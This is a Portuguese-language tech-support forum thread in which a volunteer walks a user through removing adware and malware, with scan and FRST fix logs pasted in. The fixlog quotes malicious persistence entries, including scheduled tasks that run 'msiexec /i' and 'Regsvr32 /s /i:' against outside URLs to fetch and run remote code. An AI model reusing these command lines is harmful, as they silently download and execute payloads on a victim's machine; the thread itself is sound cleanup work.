    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{C540712E-34FC-476B-AB3F-972B5792E37C}en_ribs_bgd.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{CBA9F6F8-071E-4587-9852-AC008CE62FB1}sb_ribs_bgd.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{D5058BB1-750B-49A1-B023-1AEBAC0C5636}application.sif    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{D5058BB1-750B-49A1-B023-1AEBAC0C5636}sb_ribs_bgd.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{D5C8E951-80C1-458C-8809-C6BDBE8772C0}.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{EF70F58D-8515-4979-B7AA-ADDEF80F7CF4}.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{FB245ED0-CD60-4B9C-9EB2-CDB63D189087}ae_ribs_bgd.png    =>.Superfluous.Temporary.Empty
    MOVIDO pasta: C:\Windows\SECOH-QAD.exe    =>HackTool.KMSpico
    MOVIDO arquivo: C:\Program Files (x86)\Elex-tech  =>.Superfluous.Elex
    MOVIDO arquivo: C:\Program Files\KMSpico  =>HackTool.KMSpico
    MOVIDO arquivo: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico  =>HackTool.KMSpico
    MOVIDO arquivo: C:\Users\AnjiN\Music\Romantic Cello Favorites (David Popper) (1992) (Janos Starker, Shigeo Neriki)  =>PUP.Optional.Vonteera
    MOVIDO arquivo: C:\Program Files (x86)\QuickTime  =>Riskware.QuickTime
    MOVIDO arquivo: C:\Program Files (x86)\Elex-tech\YAC  =>.Superfluous.YetAnotherCleaner
    MOVIDO arquivo: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime  =>Riskware.QuickTime
    MOVIDO arquivo: C:\Windows\Installer\MSI14FD.tmp-  =>.Superfluous.Empty
    MOVIDO arquivo: C:\Windows\Installer\MSI3D4.tmp-  =>.Superfluous.Empty
    MOVIDO arquivo: C:\Windows\Installer\MSI3F79.tmp-  =>.Superfluous.Empty
    MOVIDO arquivo: C:\Windows\Installer\MSI4354.tmp-  =>.Superfluous.Empty
    MOVIDO arquivo: C:\Windows\Installer\MSI7DC.tmp-  =>.Superfluous.Empty
    MOVIDO arquivo: C:\Windows\Installer\MSI9EC2.tmp-  =>.Superfluous.Empty
    MOVIDO arquivo: C:\Windows\Installer\MSIBB10.tmp-  =>.Superfluous.Empty
    MOVIDO arquivo: C:\Windows\Installer\MSIBE93.tmp-  =>.Superfluous.Empty
    MOVIDO arquivo: C:\Windows\Installer\MSIBF18.tmp-  =>.Superfluous.Empty
    MOVIDO arquivo: C:\Users\AnjiN\AppData\Local\Temp\chrome_BITS_9892_32197  =>.Superfluous.Empty
    
    
    ---\\  Registro ( Chaves, Valores, Dados ) (9)
    SUPRIMIDO dados: HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{06b710c1-e376-4818-977e-59286e925d61}\\DhcpNameServer [Bad : 201.21.192.168 201.21.192.122]  =>Hijacker.Browser
    SUPRIMIDO dados: HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\\DhcpNameServer [Bad : 201.21.192.168 201.21.192.122]  =>Hijacker.Browser
    SUPRIMIDO chave*: HKLM\SYSTEM\CurrentControlSet\Services\Service KMSELDI [C:\Program Files\KMSpico\Service_KMS.exe (Not File)]  =>HackTool.KMSpico
    SUPRIMIDO chave*: HKLM\SOFTWARE\Wow6432Node\Firefox []  =>Adware.GhokswaBrowser
    SUPRIMIDO chave: HKLM\SOFTWARE\Firefox []  =>Adware.GhokswaBrowser
    SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8B29D47F-92E2-4C20-9EE0-F710991F5D7C}_is1 [KMSpico]  =>HackTool.KMSpico
    SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\02274F1D2E6A9F8449FE4DD52EFC967F [C:\ProgramData\Ableton\Live 9 Suite\Resources\Python\abl.webconnector\abl\webconnector\auto_updates.py]  =>Adware.Sambreel
    SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\Wow6432Node\Elex-tech []  =>.Superfluous.Elex
    SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\iSafe [ELEX DO BRASIL PARTICIPAÇÕES LTDA]  =>.Superfluous.Elex
    
    
    ---\\  Resumo dos elementos encontrados na sua estação de trabalho (12)
    https://nicolascoolman.eu/2017/01/20/logiciels-superflus/  =>.Superfluous.Empty
    https://nicolascoolman.eu/2017/01/20/logiciels-superflus/  =>.Superfluous.Temporary.Empty
    https://nicolascoolman.eu/2017/01/20/logiciels-superflus/  =>.Superfluous.Temporary
    https://nicolascoolman.eu/2017/01/20/logiciels-superflus/  =>.Superfluous.Temporary.Various
    https://nicolascoolman.eu/2017/02/16/hacktool-kmspico/  =>HackTool.KMSpico
    https://nicolascoolman.eu/2017/03/28/superfluous-elex/  =>.Superfluous.Elex
    https://www.nicolascoolman.com/fr/trojan-vonteera/  =>PUP.Optional.Vonteera
    https://nicolascoolman.eu/2017/01/15/riskware-quicktime/  =>Riskware.QuickTime
    https://nicolascoolman.eu/2017/01/20/logiciels-superflus/  =>.Superfluous.YetAnotherCleaner
    https://nicolascoolman.eu/2017/02/02/hijacker-browser-2/  =>Hijacker.Browser
    https://nicolascoolman.eu/2017/02/19/adware-ghokswabrowser/  =>Adware.GhokswaBrowser
    https://www.nicolascoolman.com/fr/pup-optional-sambreel/  =>Adware.Sambreel
    
    
    ---\\  Dodatkowe oczyszczenie. (22)
    ~ Chave de registro Tracing Supprimido (22)
    ~ Remover os relatórios antigos ZHPCleaner. (0)
    
    
    ---\\ Resultado de reparação
    Reparação efectuada com sucesso
    ~ Este navegador está faltando ! (Mozilla Firefox)
    ~ Este navegador está faltando ! (Opera Software)
    
    
    ---\\ Estatísticas
    ~ Items scan : 539
    ~ Items encontrado : 0
    ~ items cancelados : 0
    ~ Items réparo : 128
    
    
    ~ End of clean in 00h00mn43s
    ~====================
    ZHPCleaner-[R]-12052017-22_31_56.txt
    ZHPCleaner-[S]-12052017-22_20_48.txt
    ZHPCleaner-[S]-12052017-22_28_14.txt

     

     

     

    No aguardo!

     

    Grato!

     

    Editado por Thiago Anjin

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    diego_moicano    473

    Caro @Thiago Anjin

     

    Por favor, não coloque os logs entre TAGS, obrigado!

     

    Desative temporariamente seu antivírus, antispywares e firewall, para não causar conflitos.

     

    Baixe o Farbar Recovery Scan Tool e salve-o na Área de Trabalho (Desktop).


    32 bit (x86) ou 64 bit (x64)

     

    • Clique duas vezes para executar a ferramenta.
      • Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png
    • Marque a caixa Arquivos 90 dias,  e clique no botão Examinar.
    • Aguarde e ao final os logs FRST.txt e Addition.txt serão salvos em sua Área de Trabalho (Desktop).
    • Selecione, copie e cole o conteúdo do log  FRST.txt em sua próxima resposta.
    • Anexe o log Addition.txt

    Abraços :D

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Thiago Anjin    0
  • Autor do tópico
  • Olá, @diego_moicano! Perdão pela forma incorreta de enviar os logs. Eu estou tentando colar o log aqui, mas não envia. Talvez seja o tamanho do texto colado. Tento visualizar e o seguinte erro aparece:
     

    Citação


    "Fatal error: Maximum execution time of 30 seconds exceeded in /www/invision/system/Text/Parser.php on line 899"

     

     

    Vou anexar o FRST.txt também, daí vai! Juro que tentei várias vezes responder o post com o log colado aqui no corpo da mensagem, mas não obtive sucesso!

     

     

    Addition.txt em anexo!

     

    Grato!

    Addition.txt

    FRST.txt

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    diego_moicano    473

    Amigo sem problemas... se for melhor anexar os logs, tudo ok! ;)

     

    Por acaso você instalou o Chrome neste local?

     

    C:\Program Files (x86)\Bagsarah\Application\chrome.exe

     

    Abraços :D

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Thiago Anjin    0
  • Autor do tópico
  • Não instalei.. 

     

    Enquanto tentava colar o log, li este caminho ai, e achei muito estranho. 

     

    Pelo visto, Everness é apenas uma das faces desse malware...

     

     

    Abraço!

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    diego_moicano    473

    Caro @Thiago Anjin

     

    >>> Desinstale totalmente o Chrome.

     

    Desative temporariamente seu antivírus, antispywares e firewall, para não causar conflitos.

     

    Baixe o arquivo (fixlist.txt) no anexo deste post e salve-o na Área de Trabalho (Desktop).

    Execute o FRST.exe (ou FRST64.exe) e clique no botão Corrigir.

    Aguarde... ao final será gerado o log Fixlog.txt  salvo em sua Área de Trabalho (Desktop).

    Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

     

    Abraços :D

    fixlist.txt

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Thiago Anjin    0
  • Autor do tópico
  • Olá, caro @diego_moicano!

     

    Removi o Chrome através do painel de controle, e em seguida realizei os passos seguintes. Aí segue o log:

     

    =============

     

    Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 14-05-2017
    Executado por AnjiN (19-05-2017 22:13:48) Run:1
    Executando a partir de C:\Users\AnjiN\Desktop
    Perfis Carregados: AnjiN (Perfis Disponíveis: defaultuser0 & AnjiN)
    Modo da Inicialização: Normal
    ==============================================

    fixlist Conteúdo:
    *****************
    CreateRestorePoint:
    CloseProcesses:
    HKU\S-1-5-21-1706358801-989810220-3475375959-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj88NUMcMTw3FUY2NYI5RUUxM8M4MkFyFkQYRYJQN8E2Fc== /q
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
    IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
    IFEO\taskmgr.exe: [Debugger]
    SearchScopes: HKU\S-1-5-21-1706358801-989810220-3475375959-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    HKU\S-1-5-21-1706358801-989810220-3475375959-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) <==== ATENÇÃO
    U2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [103064 2017-05-10] () <==== ATENÇÃO
    S3 dbx; system32\DRIVERS\dbx.sys [X]
    S1 gbpddfac; system32\drivers\gbpddfac64.sys [X]
    S0 gbpddreg; system32\drivers\gbpddreg64.sys [X]
    2017-02-16 01:25 - 2017-02-16 01:25 - 49239544 _____ (Sony) C:\Users\AnjiN\AppData\Local\Temp\xcs8E7C.tmp.exe
    Task: {CB06D178-DC95-422F-832C-57E742D2BB04} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
    Task: {5197D388-7E9A-44FD-A91C-B1025514E493} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj88NUMcMTw3FUY2NYI5RUUxM8M4MkFyFkQYRYJQN8E2Fc== scrobj.dll
    Task: {D14CF6DE-02E9-4E16-955D-F8F13A0FFA51} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj88NUMcMTw3FUY2NYI5RUUxM8M4MkFyFkQYRYJQN8E2Fc== scrobj.dll
    CMD: ipconfig /flushdns
    EmptyTemp:

    *****************

    Ponto de Restauração criado com sucesso.
    Processos fechados com sucesso.
    HKU\S-1-5-21-1706358801-989810220-3475375959-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valor removido (a) com sucesso.
    HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => chave removido (a) com sucesso.
    HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => chave removido (a) com sucesso.
    HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => chave removido (a) com sucesso.
    HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => chave removido (a) com sucesso.
    HKU\S-1-5-21-1706358801-989810220-3475375959-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor removido (a) com sucesso.
    HKU\S-1-5-21-1706358801-989810220-3475375959-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => chave removido (a) com sucesso.
    HKLM\System\CurrentControlSet\Services\FirefoxU => chave removido (a) com sucesso.
    FirefoxU => serviço removido (a) com sucesso.
    HKLM\System\CurrentControlSet\Services\dbx => chave removido (a) com sucesso.
    dbx => serviço removido (a) com sucesso.
    HKLM\System\CurrentControlSet\Services\gbpddfac => chave removido (a) com sucesso.
    gbpddfac => serviço removido (a) com sucesso.
    HKLM\System\CurrentControlSet\Services\gbpddreg => chave removido (a) com sucesso.
    gbpddreg => serviço removido (a) com sucesso.
    C:\Users\AnjiN\AppData\Local\Temp\xcs8E7C.tmp.exe => movido com sucesso
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CB06D178-DC95-422F-832C-57E742D2BB04} => chave removido (a) com sucesso.
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB06D178-DC95-422F-832C-57E742D2BB04} => chave removido (a) com sucesso.
    C:\Windows\System32\Tasks\T0528 => movido com sucesso
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\T0528 => chave removido (a) com sucesso.
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5197D388-7E9A-44FD-A91C-B1025514E493} => chave removido (a) com sucesso.
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5197D388-7E9A-44FD-A91C-B1025514E493} => chave removido (a) com sucesso.
    C:\Windows\System32\Tasks\PowerWord-SCT-JT => movido com sucesso
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => chave removido (a) com sucesso.
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D14CF6DE-02E9-4E16-955D-F8F13A0FFA51} => chave removido (a) com sucesso.
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D14CF6DE-02E9-4E16-955D-F8F13A0FFA51} => chave removido (a) com sucesso.
    C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe => movido com sucesso
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => chave removido (a) com sucesso.

    ========= ipconfig /flushdns =========


    Configura‡Æo de IP do Windows

    Libera‡Æo do Cache do DNS Resolver bem-sucedida.

    ========= Fim de CMD: =========


    =========== EmptyTemp: ==========

    BITS transfer queue => 302969 B
    DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 156036319 B
    Java, Flash, Steam htmlcache => 1008 B
    Windows/system/drivers => 306951038 B
    Edge => 83520623 B
    Chrome => 128605935 B
    Firefox => 0 B
    Opera => 0 B

    Temp, IE cache, history, cookies, recent:
    Default => 0 B
    Users => 0 B
    ProgramData => 0 B
    Public => 0 B
    systemprofile => 2431 B
    systemprofile32 => 128 B
    LocalService => 30472 B
    NetworkService => 83866 B
    defaultuser0 => 7296 B
    AnjiN => 1117195497 B

    RecycleBin => 925629295 B
    EmptyTemp: => 2.5 GB de dados temporários Removidos.

    ================================


    O sistema precisou ser reiniciado.

    ==== Fim de Fixlog 22:16:19 ====

     

     

    Após reiniciar, notei que o ícone do chrome permanecia no computador, ainda endereçado no caminho

     

    C:\Program Files (x86)\Bagsarah\Application\chrome.exe

     

    Também notei (isso anteriormente já tinha) atalhos de internet "criados" na minha área de trabalho, com ícones e títulos de Casas Bahia, Americanas e Ponto Frio. Abrindo as propriedades dos atalhos, os seguintes endereços em cada um:

     

    - "C:\Program Files (x86)\Bagsarah\Application\chrome.exe" http://hohosearch.com/?uid=1234#red=aHR0cDovL2FkLnphbm94LmNvbS9wcGMvPzMwMjkwOTg3QzI4MTIyOTMxMVQ="

    (iniciar em "C:\Program Files (x86)\Bagsarah\Application")

     

    - "C:\Program Files (x86)\Everness\Application\chrome.exe" http://ad.zanox.com/ppc/?28341281C23251407T (iniciar em "C:\Program Files (x86)\Everness\Application")

     

    - "C:\Program Files (x86)\Bagsarah\Application\chrome.exe" http://compre.você/v2/1248175c752 (iniciar em "C:\Program Files (x86)\Bagsarah\Application")

     

    Peço perdão se enviei informações fora de contexto, mas achei interessante acrescentar!

     

    Grato!

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    diego_moicano    473

    Caro @Thiago Anjin

     

    Está ótimo! :)

     

    Baixe a Malwarebytes Anti-Malware (MBAM).
     
    Clique duas vezes no mbam-setup.exe para instalar o programa.

    • Desmarque a caixa Ativar trial gratuito do MalwareBytes Anti-Malware PRO.
    • Se houver atualizações a serem feitas, serão baixadas e instaladas..
    • Clique em Configurações, clique em Detecção e proteção, marque Verificar por Rootkits.
    • Volte ao Painel e por fim clique em Verificar agora.
    • Começará então o exame. Aguarde, pois pode demorar.
    • Ao acabar o exame, se houver itens encontrados, certifique-se que estejam todas marcados e clique no botão Remover Selecionadas
    • Ao final da desinfecção, poderá aparecer um aviso se quer reiniciar o PC. (Ver Nota abaixo)
    • O log é automaticamente salvo pelo MBAM e para vê-lo, clique na aba Histórico -> Registros do aplicativo na janela principal do programa.
    • Clique duas vezes no log (Registro de verificação). Utilize o formato .txt para exportar o log.
    • O log de Proteção é desnecessário para a análise, exporte sempre o log correto.
    • Selecione, copie e cole o conteúdo deste log em sua próxima resposta.

     

    NOTA: Se o MBAM encontrar arquivos que não consiga remover, poderá ter de reiniciar o PC (talvez mais de uma vez). Faça isso imediatamente, ao ser perguntado se quer reiniciar o PC.

     

    Abraços :D

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Thiago Anjin    0
  • Autor do tópico
  • Olá, @diego_moicano!

     

    Já antecipando o pedido de perdão pela demora nos resultados, explico que precisei me ausentar do mundo cibernético por motivos de saúde! Acabei, igualmente como o notebook, pegando um malware biológico! hehe :-)

     

    Sobre o MBAM, notei algumas alterações de opções, comparado com as intruções que me enviaste. Citarei elas, pois caso alguma seja muito importante, estarás ciente:

    1) Em qualquer momento do processo apareceu a caixa Ativar trial gratuito do MalwareBytes Anti-Malware PRO";

    2) Nas configurações a aba "Detecção e Proteção" agora é apenas "Proteção";

    3) Na aba "Painel", o botão "Verificar agora" agora é "Analisar agora";

    4) No final do exame, não existe opção "Remover Selecionadas", apenas "Enviar para quarentena";

     

    A ultima alteração achei a mais importante, as outras três só citei para confirmar que não instalei nada incorretamente. Porém a diferença entre remover e enviar para quarentena poderia ter mais diferença no resultado!

     

    Sobre os resultados, estranhei a relação entre detectados e movidos pra quarentena, então executei algumas vezes a rotina, pra ter certeza. Ao acessar o resultado, aparecem muitos logs, um numero muito maior do que os que eu pedi para executar. Parecem ser resultados de exclusões ao reiniciar. Anexarei eles, ok?

     

    Abraço!

     

    mbam1.txt

    mbam2.txt

    mbam3.txt

    mbam4.txt

    mbam5.txt

    mbam6.txt

    mbam7.txt

    mbam8.txt

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    diego_moicano    473
    Postado (editado)

    Caro @Thiago Anjin

     

    Taí um vírus que é um grande problema! :)

     

    Ok... obrigado pelas info. :joia:

     

    Pela ordem...

     

    Etapa 1

     

    Baixe e execute (como administrador) a ferramenta abaixo:

     

    https://www.bleepingcomputer.com/download/chrome-cleanup-tool/

     

    Etapa 2

     

    Baixe e execute (como administrador) a ferramenta abaixo:

     

    https://www.avast.com/pt-br/browser-cleanup

     

    Etapa 3

     

    Faça um novo log com o FRST, porém antes de clicar no botão Examinar, marque a opção Addition.

     

    Anexe os logs, por favor.

     

    Abraços :D

    Editado por diego_moicano

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    diego_moicano    473

    Opa, tivemos uma boa melhora! :)

     

    Atualize o MalwareBytes, faça um novo scan e poste o log.

     

    Abraços :D

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Thiago Anjin    0
  • Autor do tópico
  • Ola, @diego_moicano!

     

    Que bom saber da melhora do quadro do notebook! :D

     

    Sobre a atualização do MBAM, não existem atualizações até o momento (entendi que tu não te refere á atualização pra versão PRO, e sim pra atualização de banco de dados de malwares). Desse modo, prossegui para a análise, confome passos anteriores! Segue em anexo o log!

     

    Grato!

    mbamUltimo.txt

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    diego_moicano    473

    Caro @Thiago Anjin

     

    Opa, conheço muita gente daí do Sul que trabalha com segurança da informação, eu mesmo também trabalho aí! ;)

     

    Desative temporariamente seu antivirus, antispywares e firewall, para não causar conflitos.

    Baixe o Stinger e salve em sua Área de trabalho (Desktop).
    32 bit (x86) ou 64 bit (x64)

    • Execute o arquivo Stinger.exe
      • Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png
    • Clique no botão “I Accept”


    Stinger%20a.png

    Na nova janela clique em “Advanced” e depois “Settings”

    Stinger%20b.png

    Na janela configurações deixe conforme imagem abaixo e clique no botão “Save”

    9hnsyu.png

    Clique em “Customize my Scan”

    Stinger%20f.png

    Selecione as unidades do sistema e em seguida clique no botão “Scan”

    Stinger%20g.png

    Ao final clique em “View log”, será aberto uma janela com o log em seu navegador.
    Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

     

    Abraços :D

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Thiago Anjin    0
  • Autor do tópico
  • Olá, @diego_moicano!

     

    Segue o log:

     

    ====

     

    McAfee Stinger Scan Results

    McAfee® Labs Stinger™ Version 12.1.0.2391 built on Jun  4 2017 at 23:34:03
    Copyright© 2015, McAfee, Inc. All Rights Reserved.

    AV Engine version v5900.7806 for Windows.
    Virus data file v1000.0 created on Jun 5, 2017
    Ready to scan for 10132 viruses, trojans and variants.

    Custom scan initiated on segunda-feira, junho 05, 2017 18:05:46


    Rootkit scan result : Clean.


    C:\AdwCleaner\quarantine\files\qpkspfomzvdoajfvfsrvaufjrubikala\User Data\Default\File System\000\t\00\00000001\IK Multimedia AmpliTube 3 Complete v3 13 1 Incl Keygen-R2R [oddsox]\r2r-2176.rar\R2R\IK_Multimedia_Keygen.exe is infected with Artemis!C0CB490CE732
    C:\AdwCleaner\quarantine\files\qpkspfomzvdoajfvfsrvaufjrubikala\User Data\Default\File System\000\t\00\00000001\IK Multimedia AmpliTube 3 Complete v3 13 1 Incl Keygen-R2R [oddsox]\r2r-2176.rar\R2R\IK_Multimedia_Keygen.exe couldn't be repaired
    C:\AdwCleaner\quarantine\files\qpkspfomzvdoajfvfsrvaufjrubikala\User Data\Default\File System\000\t\00\00000001 is infected
    C:\Program Files (x86)\Sony\Sound Forge Pro 10.0\Keygen.exe [MD5:3208ee1f6fdaeb33f0f976efa2ab0e3d] is infected with Artemis!3208EE1F6FDA
    C:\Program Files (x86)\Sony\Sound Forge Pro 10.0\Keygen.exe has been Deleted
    C:\programas\Eagle\Aspirin_Eagle.v7.7.0.(win32).exe [MD5:6b2356f801d13e46cbaaf79dbf86d204] is infected with Artemis!6B2356F801D1
    C:\programas\Eagle\Aspirin_Eagle.v7.7.0.(win32).exe has been Deleted
    C:\programas\SoundForge\Keygen.exe [MD5:3208ee1f6fdaeb33f0f976efa2ab0e3d] is infected with Artemis!3208EE1F6FDA
    C:\programas\SoundForge\Keygen.exe has been Deleted
    C:\Users\AnjiN\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\00\00000001\IK Multimedia AmpliTube 3 Complete v3 13 1 Incl Keygen-R2R [oddsox]\r2r-2176.rar\R2R\IK_Multimedia_Keygen.exe is infected with Artemis!C0CB490CE732
    C:\Users\AnjiN\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\00\00000001\IK Multimedia AmpliTube 3 Complete v3 13 1 Incl Keygen-R2R [oddsox]\r2r-2176.rar\R2R\IK_Multimedia_Keygen.exe couldn't be repaired
    C:\Users\AnjiN\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\00\00000001 is infected
    C:\Users\AnjiN\Downloads\IK Multimedia AmpliTube 3 Complete v3 13 1 Incl Keygen-R2R [oddsox].rar\IK Multimedia AmpliTube 3 Complete v3 13 1 Incl Keygen-R2R [oddsox]\r2r-2176.rar\R2R\IK_Multimedia_Keygen.exe is infected with Artemis!C0CB490CE732
    C:\Users\AnjiN\Downloads\IK Multimedia AmpliTube 3 Complete v3 13 1 Incl Keygen-R2R [oddsox].rar\IK Multimedia AmpliTube 3 Complete v3 13 1 Incl Keygen-R2R [oddsox]\r2r-2176.rar\R2R\IK_Multimedia_Keygen.exe couldn't be repaired
    C:\Users\AnjiN\Downloads\IK Multimedia AmpliTube 3 Complete v3 13 1 Incl Keygen-R2R [oddsox].rar is infected
    C:\vst\Ableton.Live.Suite.v9.7.1\R2R\Ableton_KeyGen.exe\5.nsis is infected with Artemis!5320CBC816ED
    C:\vst\Ableton.Live.Suite.v9.7.1\R2R\Ableton_KeyGen.exe\5.nsis has been Deleted
    C:\vst\Empty.Room.Systems.EchORek2.v1.0.1.Incl.Keygen-R2R.zip\ERS_KeyGen.exe\5.nsis is infected with Artemis!A01E8A0046EC
    C:\vst\Empty.Room.Systems.EchORek2.v1.0.1.Incl.Keygen-R2R.zip\ERS_KeyGen.exe\5.nsis has been Deleted
    C:\vst\GSI\Genuine Soundware Die Funky Maschine ZD6 VSTi.v1.1.Incl.Keygen-AiR\Keygen.exe [MD5:f25ce66d68b113ef782ea904dbcc78b3] is infected with Artemis!F25CE66D68B1
    C:\vst\GSI\Genuine Soundware Die Funky Maschine ZD6 VSTi.v1.1.Incl.Keygen-AiR\Keygen.exe has been Deleted
    C:\vst\GSI\Genuine Soundware Electric Grand EG70 VSTi.v1.0.Incl.Keygen-AiR\Keygen.exe [MD5:f25ce66d68b113ef782ea904dbcc78b3] is infected with Artemis!F25CE66D68B1
    C:\vst\GSI\Genuine Soundware Electric Grand EG70 VSTi.v1.0.Incl.Keygen-AiR\Keygen.exe has been Deleted
    C:\vst\GSI\Genuine Soundware GS-201 Tape Echo VST.v1.1.3.Incl.Keygen-AiR\Keygen.exe [MD5:f25ce66d68b113ef782ea904dbcc78b3] is infected with Artemis!F25CE66D68B1
    C:\vst\GSI\Genuine Soundware GS-201 Tape Echo VST.v1.1.3.Incl.Keygen-AiR\Keygen.exe has been Deleted
    C:\vst\GSI\Genuine Soundware KeyPerformer VSTi.v1.0.Incl.Keygen-AiR\Keygen.exe [MD5:f25ce66d68b113ef782ea904dbcc78b3] is infected with Artemis!F25CE66D68B1
    C:\vst\GSI\Genuine Soundware KeyPerformer VSTi.v1.0.Incl.Keygen-AiR\Keygen.exe has been Deleted
    C:\vst\GSI\Genuine Soundware MrRay73 Mark II VSTi.v2.0.3.Incl.Keygen-AiR\Keygen.exe [MD5:f25ce66d68b113ef782ea904dbcc78b3] is infected with Artemis!F25CE66D68B1
    C:\vst\GSI\Genuine Soundware MrRay73 Mark II VSTi.v2.0.3.Incl.Keygen-AiR\Keygen.exe has been Deleted
    C:\vst\GSI\Genuine Soundware Spring Reverb Type4 VST.v1.01.Incl.Keygen-AiR\Keygen.exe [MD5:f25ce66d68b113ef782ea904dbcc78b3] is infected with Artemis!F25CE66D68B1
    C:\vst\GSI\Genuine Soundware Spring Reverb Type4 VST.v1.01.Incl.Keygen-AiR\Keygen.exe has been Deleted
    C:\vst\GSI\Genuine Soundware VB3 The Ultimate Virtual Tonewheel Organ VSTi.v1.22.Incl.Keygen-AiR\Keygen.exe [MD5:f25ce66d68b113ef782ea904dbcc78b3] is infected with Artemis!F25CE66D68B1
    C:\vst\GSI\Genuine Soundware VB3 The Ultimate Virtual Tonewheel Organ VSTi.v1.22.Incl.Keygen-AiR\Keygen.exe has been Deleted
    C:\vst\Kontakt\5.6.5 Update\R2R\Kontakt_Keygen.exe\5.nsis is infected with Artemis!CD47E1FC8B94
    C:\vst\Kontakt\5.6.5 Update\R2R\Kontakt_Keygen.exe\5.nsis has been Deleted
    C:\vst\Modo Bass\mac\R2R\IK_Multimedia_Keygen.exe [MD5:2f7fc25bfabed7dd4114f95e6067547a] is infected with Artemis!2F7FC25BFABE
    C:\vst\Modo Bass\mac\R2R\IK_Multimedia_Keygen.exe has been Deleted
    C:\vst\Modo Bass\win\R2R\IK_Multimedia_Keygen.exe [MD5:2f7fc25bfabed7dd4114f95e6067547a] is infected with Artemis!2F7FC25BFABE
    C:\vst\Modo Bass\win\R2R\IK_Multimedia_Keygen.exe has been Deleted
    C:\vst\Sax\The.Saxophones\R2R\SWAM_Engine_KeyGen.exe [MD5:d742ee209d3db4a65a794b5000a6f837] is infected with Artemis!D742EE209D3D
    C:\vst\Sax\The.Saxophones\R2R\SWAM_Engine_KeyGen.exe has been Deleted
